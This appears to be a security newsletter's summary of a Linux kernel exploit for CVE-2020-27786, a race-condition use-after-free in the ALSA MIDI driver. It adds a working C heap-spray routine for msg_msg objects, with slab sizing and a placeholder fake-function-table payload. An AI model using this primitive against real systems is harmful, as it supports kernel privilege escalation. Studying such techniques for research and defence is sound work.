tags: linux, kernel, uaf, race_condition, rop
original link: CVE-2020-27786 (Race Condition + Use-After-Free)
newsletter link: exploits.club Weekly Newsletter 37 - Juicy Overflows, The Art Of Exploitation, Rust in Firmware, and More


Exploits Club Summary:

We love a post that talks methodology, but we also love one that gets right into the nitty-gritty. This new one from @ii4gsp is very much the latter, walking through his exploit for CVE-2020-27786, a use-after-free caused by a race condition in the Linux kernel's MIDI driver (ALSA rawmidi). The post briefly covers the root cause and the patch before diving into exploitation. He bypassed KASLR using msg_msg, then hijacked a tty_struct, pairing it with a sprayed ROP chain and fake function table, to successfully escalate privileges.
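Since the summary leans on msg_msg spraying, here is an added example (ours, not code from @ii4gsp's post) of the mechanism behind it: every msgsnd() allocates a struct msg_msg in kmalloc, a fixed header followed by the payload, so the payload length chooses the slab the object lands in. The header size (48 bytes), the x86_64 field layout, the 4096-byte first-segment limit and the 16384-byte default per-queue byte limit are assumptions about a typical x86_64 kernel; the 0x41-filled "fake function table" is a placeholder payload, not a real gadget or ops table.

```c
/* Added example: sizing and performing a msg_msg spray via System V message queues.
 * Assumes a typical x86_64 Linux kernel; not taken from the original write-up. */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

/* Userland mirror of the kernel's struct msg_msg header (assumed x86_64 layout):
 *   struct list_head m_list;    16 bytes, links the message into its queue
 *   long m_type;                 8 bytes, message type chosen by the sender
 *   size_t m_ts;                 8 bytes, payload length
 *   struct msg_msgseg *next;     8 bytes, continuation segments for large messages
 *   void *security;              8 bytes
 * The payload follows immediately, so kmalloc is asked for 48 + m_ts bytes. */
struct msg_msg_hdr {
    uint64_t m_list_next, m_list_prev;
    long m_type;
    size_t m_ts;
    void *next;
    void *security;
};

#define MSG_MSG_HDR 48
#define DATALEN_MSG (4096 - MSG_MSG_HDR)   /* max payload kept in the first segment */
#define MSGMNB_DEFAULT 16384               /* default per-queue byte limit (assumed) */

/* Payload length that makes the whole msg_msg fit a given kmalloc slab, or -1 if the
 * slab cannot hold the header or the payload would spill into msg_msgseg segments. */
long msg_payload_for_slab(size_t slab_size)
{
    if (slab_size <= MSG_MSG_HDR) return -1;
    if (slab_size - MSG_MSG_HDR > DATALEN_MSG) return -1;
    return (long)(slab_size - MSG_MSG_HDR);
}

/* How many messages of payload_len bytes fit in one queue under the default limit. */
int msgs_per_queue(size_t payload_len)
{
    if (payload_len == 0 || payload_len > DATALEN_MSG) return 0;
    return (int)(MSGMNB_DEFAULT / payload_len);
}

struct spray_msg {
    long mtype;
    char mtext[DATALEN_MSG];
};

/* Queue `count` copies of `payload` in a fresh private queue. Each msgsnd() leaves one
 * msg_msg allocated in the kernel until it is received or the queue is removed.
 * Returns the queue id (>= 0) or -1 on failure. */
int spray_msg_msg(const void *payload, size_t payload_len, int count, long mtype)
{
    if (payload_len > DATALEN_MSG || mtype <= 0 || count > msgs_per_queue(payload_len))
        return -1;
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    if (qid < 0) return -1;
    for (int i = 0; i < count; i++) {
        struct spray_msg m;
        m.mtype = mtype;
        memcpy(m.mtext, payload, payload_len);
        if (msgsnd(qid, &m, payload_len, IPC_NOWAIT) < 0) {
            msgctl(qid, IPC_RMID, NULL);
            return -1;
        }
    }
    return qid;
}

int main(void)
{
    /* Target kmalloc-1024: 976-byte payloads. Fill them with a placeholder pattern
     * standing in for a fake function table (a real exploit would place gadget and
     * ROP-chain addresses here). */
    long len = msg_payload_for_slab(1024);
    if (len < 0) return 1;
    unsigned char payload[DATALEN_MSG];
    memset(payload, 0x41, (size_t)len);

    int qid = spray_msg_msg(payload, (size_t)len, 16, 1);
    if (qid < 0) {
        perror("spray_msg_msg");
        return 1;
    }
    printf("sprayed 16 x msg_msg (%ld-byte payload, ~1024-byte objects) in queue %d\n", len, qid);
    msgctl(qid, IPC_RMID, NULL);   /* frees the sprayed objects again */
    return 0;
}
```

The helper keeps the spray inside one segment on purpose: once a payload exceeds DATALEN_MSG the kernel chains extra msg_msgseg allocations, which land in different slabs and make the layout harder to reason about. Note that 16 messages of 976 bytes stay under the default 16384-byte queue limit; a larger spray needs several queues.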